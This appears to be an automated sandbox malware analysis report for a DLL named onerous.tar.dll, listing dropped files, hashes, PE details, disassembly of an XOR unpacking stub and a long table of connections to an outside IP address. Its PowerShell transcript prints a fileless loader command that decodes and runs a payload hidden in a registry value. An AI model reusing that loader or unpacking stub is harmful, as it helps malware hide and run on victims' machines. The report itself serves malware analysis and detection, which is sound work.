                                                                                                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.0.cs"
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dll
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3584
                                                                                                                                      Entropy (8bit):2.6244385522478124
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:6AW7qMTxzJUyNjWQYwSJbYgH1ulma3Sq:SqYxAgWT44K
                                                                                                                                      MD5:9E447BB5EA9933E1D20CB71DC2AC790A
                                                                                                                                      SHA1:C1D58647C580554A60A6027018CEE3C39143C2EE
                                                                                                                                      SHA-256:BA93835763E0E4FB5CFD4E71738E1E8205ED15F550E6E72848FFC8B9D7617FF9
                                                                                                                                      SHA-512:D2461C61C6C837FE436AACC1E5A102D46DC316F96A00DA9554E3B9FF3E3F5D434427A10C6E01F8A063A841E5AF38D2458685FFB8017B413BBF8BC4FDDDF91A4B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...............'...................................... 6............ H............ P.....P ......_.........e.....p.....v..........................._.!..._...!._.&..._.......+.....4.:.....6.......H.......P..................................................<Module>.jery0dbp.dll.mme.W32.mscor
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.out
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):412
                                                                                                                                      Entropy (8bit):4.871364761010112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF69EAEE788C6BF5D7.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40233
                                                                                                                                      Entropy (8bit):0.6872617452706091
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:kBqoxKAuqR+uoCLYpl23DlDNwl23DlDNrl23DlDNs:kBqoxKAuqR+uoCLYpw35qw35Vw35W
                                                                                                                                      MD5:A8F2EDC39A71827BE0EBE0795F23702B
                                                                                                                                      SHA1:5CA5DDA74C4A1FA538C7E54A0EB745379DF3FA48
                                                                                                                                      SHA-256:E63BCE665483F60D0B6135DFA320890A758390B6D3ACF556563187FF1CA23455
                                                                                                                                      SHA-512:22EC5CE2106255FAEDD494C61001762E6ACC217E6500F474F62FB0362BFE736B9031722DF1DE4677363870322B14FED15A06892EB1CAB88CFD86AA05A8603ADF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF88E050867DE26AD2.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40153
                                                                                                                                      Entropy (8bit):0.6723538040068409
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+iEOnUVtj58MxzYJJtj58MxzYJatj58MxzYJP:kBqoxKAuqR+iEOnUVtdYJJtdYJatdYJP
                                                                                                                                      MD5:D072772A8EE6BB1D1F40D9F5810CFF5B
                                                                                                                                      SHA1:D59BFDF035410E69B594CE06D30CCA46732FA6CD
                                                                                                                                      SHA-256:3F8E3C2F24061C4B5041DE82829E4B1ECABC0338722626233D521A0CE1FA869D
                                                                                                                                      SHA-512:7C40C58BE6065EB2C39DBB0F7AB6EDF1A6079EDCA96483DB2E64702AD2CAC9AC23769DE290253614EE36BCB5771D3528D94F0AA78DF3AD1512AFB240BD221D36
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF9DD6CD76C3034B75.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12933
                                                                                                                                      Entropy (8bit):0.4099601119234265
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:c9lLh9lLh9lIn9lIn9lo5F9lob9lW8pxh2:kBqoIci8pxh2
                                                                                                                                      MD5:E5745EA6BA7E4FCBEBAC1A667C4DF152
                                                                                                                                      SHA1:BC748E222B6BE84EC4F67D6E787E50FBAAFA5E84
                                                                                                                                      SHA-256:F9BBCDB0B367EBB17FF40AFBDD2B55D72775108F9B6E38181AD312A88991CF5D
                                                                                                                                      SHA-512:F4FA6F5A6659E38761731163C2917BF3B1F06D121EE5E324678C11C8D023DB0FD1DE62932858C3C091BF801A550C28BFB410EDA70769BBD3BFE6663E9D022C8F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF9E03A6049D0A4DEF.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13269
                                                                                                                                      Entropy (8bit):0.6229294369515466
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:c9lLh9lLh9lIn9lIn9lo6F9loW9lWuAWPLmqptFeifFj:kBqoIBHuAMKqptFeifFj
                                                                                                                                      MD5:A36E3BD3176E8121DAF8BB5140F5CD5B
                                                                                                                                      SHA1:D9C2E1221385DFF800CF7AC01C92B6035A39C0A8
                                                                                                                                      SHA-256:5A5217CFCB402B08114E5626D8907C6E824B70AF52052D039DA21FEC0E7F88F7
                                                                                                                                      SHA-512:DBB2AED59AF662AE1B7806F0C42F3ECC1AA7CC34488C405E957FD4516D9BCF24EECBA097A60EDF93FF6D72AB46AF9E969E92797E1D9BBCEA7A1B678064022E6A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFAC17D42899691A13.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40097
                                                                                                                                      Entropy (8bit):0.6605854536521297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+iEOnURYf9isbM8Yf9isbMTYf9isbM8:kBqoxKAuqR+iEOnURYfNbdYfNbiYfNbP
                                                                                                                                      MD5:AC5213F1863C119F6DC3196DBCE0DCA1
                                                                                                                                      SHA1:2D2271EFA95BB84F2D563E7FEBFC833838DA7B5A
                                                                                                                                      SHA-256:781CE28AABCE64773A6A515B04402D7C45EF6F4848CC9609F05B630728654E0E
                                                                                                                                      SHA-512:A90B9854AD45A914A59A186F9E5F14C83564AA1D97BB293F4BE3112FD7632DD8BC9158F578775FFCEC5F1A7C603DB83AFD1BCACF720D81B2BA4DB67315E136D9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFCE3757A75A0E50D1.TMP
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40081
                                                                                                                                      Entropy (8bit):0.6597380718430703
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:kBqoxKAuvScS+j9PGN4quk6qioquk6qiXquk6qiQ:kBqoxKAuqR+j9PGN4qSq9qSqqqSqH
                                                                                                                                      MD5:04821721DBA30A21E2778D6D8165C437
                                                                                                                                      SHA1:F18DE01A4E972ABB977A9108572EBB8BBE6E6BBB
                                                                                                                                      SHA-256:5AC06ED84B93E8CA9B61369AC493D891C7CA33133B6672B2C3892E8259E5E9C8
                                                                                                                                      SHA-512:72760C16AFBF3393CBA3D2AAB46CE3D8A2DB2A060B4F5AA5013F2D4AFFED53AA150C36E681B934D0E49AEA123DA61538871D997E3F23872C3C190740042BE00C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\Documents\20201124\PowerShell_transcript.065367.Gk+Yclh6.20201124212019.txt
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1189
Entropy (8bit):5.31795925551072
Encrypted:false
SSDEEP:24:BxSAnLxvBn9zx2DOXUWOLCHGIYBtLWfHjeTKKjX4CIym1ZJX/JPOLCHGIYBtcane:BZFvhJoORF/fqDYB1ZDpFyZZa
MD5:5C19B735B25E4683C49EC53AF83C7ACA
SHA1:05EF721AC886A6BDC1F239F8D80C419B5F09ECAC
SHA-256:172C5E835C804347540CC631E478CF6F6BD8F9A5050332C68D897F73D9A00DA1
SHA-512:429A69B611E2933CF12DC93468E6BDEA393AB75C6B6B9BA40213BEF539BE25E45233462A76F33804161691939E19E046FFB116208D1502EE6801395D5AC9913E
Malicious:false
Preview:
  **********************
  Windows PowerShell transcript start
  Start time: 20201124212019
  Username: computer\user
  RunAs User: computer\user
  Configuration Name:
  Machine: 065367 (Microsoft Windows NT 10.0.17134.0)
  Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))
  Process ID: 5556
  PSVersion: 5.1.17134.1
  PSEdition: Desktop
  PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
  BuildVersion: 10.0.17134.1
  CLRVersion: 4.0.30319.42000
  WSManStackVersion: 3.0
  PSRemotingProtocolVersion: 2.3
  SerializationVersion: 1.1.0.1
  **********************
  **********************
  Command start time: 20201124212019
  **********************
  PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))
  **********************

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.655383585962167
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• VXD Driver (31/22) 0.00%
File name:onerous.tar.dll
File size:48128
MD5:79d81979dbbd1c8ceb04cc80a903ecd1
SHA1:f40959018e132fb1430f77a26903af222244676c
SHA256:5dd2f21b81330a342fe1bb9a17a8fde423928e266d4842887f8b41e5d7c2fbd6
SHA512:aeede9ecc3cbfef29ad5a1d3d4b66c245ec48e5c7407f81c7997049ce64009d80f7a97b17b8540ac247211478473ed5f1716e555e91eb64bdc94f632e90d15ec
SSDEEP:768:/JZ7EqWjTpGrg7iSh8NHj4DqVSoqngTeHzD5CHDFuGUJtB:xZ7Eq+T087E4DqVZqngOww7t
File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L....o._...........!...I..................... ....@.................................j.....@................................

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x401000
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
DLL Characteristics:DYNAMIC_BASE
Time Stamp:0x5FB76FB9 [Fri Nov 20 07:26:49 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:1
OS Version Minor:0
File Version Major:1
File Version Minor:0
Subsystem Version Major:1
Subsystem Version Minor:0
Import Hash:67fdc237b514ec9fab9c4500917eb60f

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F5E4CAC4271h
call 00007F5E4CAC428Fh
leave
jmp eax
mov eax, 00000001h
jmp 00007F5E4CAC427Eh
cmp dword ptr [ebp+0Ch], 02h
jne 00007F5E4CAC4266h
xor eax, eax
jmp 00007F5E4CAC4274h
cmp dword ptr [ebp+0Ch], 03h
jne 00007F5E4CAC4266h
xor eax, eax
jmp 00007F5E4CAC426Ah
cmp dword ptr [ebp+0Ch], 00000000h
jne 00007F5E4CAC4264h
xor eax, eax
leave
retn 000Ch
push ebx
push edi
push esi
mov ebx, C7618E88h
call 00007F5E4CAC4271h
add ebx, 04h
call 00007F5E4CAC4277h
pop esi
pop edi
pop ebx
ret
xor eax, eax
dec eax
sub ebx, eax
cmp ebx, 07618E84h
jne 00007F5E4CAC4255h
ret
push 00000040h
push 00003000h
push 0000B440h
push 00000000h
call dword ptr [0040D480h]
push ebx
push 0000B440h
push 00402000h
push eax
call 00007F5E4CAC4266h
ret
push ebp
mov ebp, esp
pushad
mov edi, dword ptr [ebp+08h]
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+14h]
lodsb
xor al, dl
stosb
ror edx, 08h
loop 00007F5E4CAC4259h
popad
leave
retn 0010h

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xd440           0x58          .data
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xe000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x1000           0xa3          0x200     False     0.318359375      data       2.32927408159   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data   0x2000           0xb498        0xb600    False     0.879035027473   data       7.7142875486    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0xe000           0xc           0x200     False     0.048828125      data       0.118369631259  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL           Import
KERNEL32.DLL  VirtualAlloc

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Nov 24, 2020 21:19:17.779686928 CET  49732        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:19:17.779814959 CET  49733        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:19:18.051623106 CET  80           49732      47.241.19.44  192.168.2.3
Nov 24, 2020 21:19:18.051764011 CET  49732        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:19:18.053018093 CET  49732        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:19:18.056646109 CET  80           49733      47.241.19.44  192.168.2.3
Nov 24, 2020 21:19:18.056849003 CET  49733        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:19:18.368787050 CET  80           49732      47.241.19.44  192.168.2.3
Nov 24, 2020 21:19:19.034208059 CET  80           49732      47.241.19.44  192.168.2.3
Nov 24, 2020 21:19:19.041465998 CET  49732        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:19:19.043437004 CET  49732        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:19:19.316349983 CET  80           49732      47.241.19.44  192.168.2.3
Nov 24, 2020 21:19:20.001231909 CET  49733        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:20:01.623794079 CET  49750        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:20:01.624310017 CET  49751        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:20:01.880029917 CET  80           49751      47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:01.880950928 CET  49751        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:20:01.881902933 CET  49751        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:20:01.885428905 CET  80           49750      47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:01.885560989 CET  49750        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:20:02.179645061 CET  80           49751      47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:02.933356047 CET  80           49751      47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:02.933444023 CET  80           49751      47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:02.933485985 CET  80           49751      47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:02.933535099 CET  80           49751      47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:02.933547020 CET  49751        80         192.168.2.3   47.241.19.44
Nov 24, 2020 21:20:02.933577061 CET  80           49751      47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:02.933578968 CET  49751        80         192.168.2.3   47.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933584929 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933589935 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933614016 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.933650970 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.933689117 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972738981 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972799063 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972841024 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972848892 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972877979 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972877979 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:02.972883940 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:02.972922087 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189378977 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189466000 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189506054 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189546108 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189591885 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189603090 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189634085 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189640999 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189646006 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189671040 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189696074 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189708948 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189733028 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189745903 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189752102 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189783096 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189805984 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189821005 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189831972 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189858913 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.189878941 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.189924955 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228682041 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228734016 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228764057 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228801012 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228838921 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228854895 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228878021 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228914022 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228918076 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228943110 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228959084 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228991032 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.229039907 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.445724964 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445785046 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445826054 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445866108 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445905924 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445954084 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445981979 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.445997953 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446012974 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446018934 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446022987 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446038008 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446054935 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446078062 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446116924 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446137905 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446146965 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446156979 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446190119 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446197987 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446223021 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446237087 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446258068 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446285963 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446295023 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446329117 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446342945 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446367025 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446382046 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446407080 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446439981 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446466923 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446480989 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446505070 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446521997 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446540117 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446564913 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446604013 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582489967 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582540989 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582581997 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582618952 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582667112 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582698107 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582710981 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582730055 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582750082 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582752943 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582787991 CET4975180192.168.2.347.241.19.44
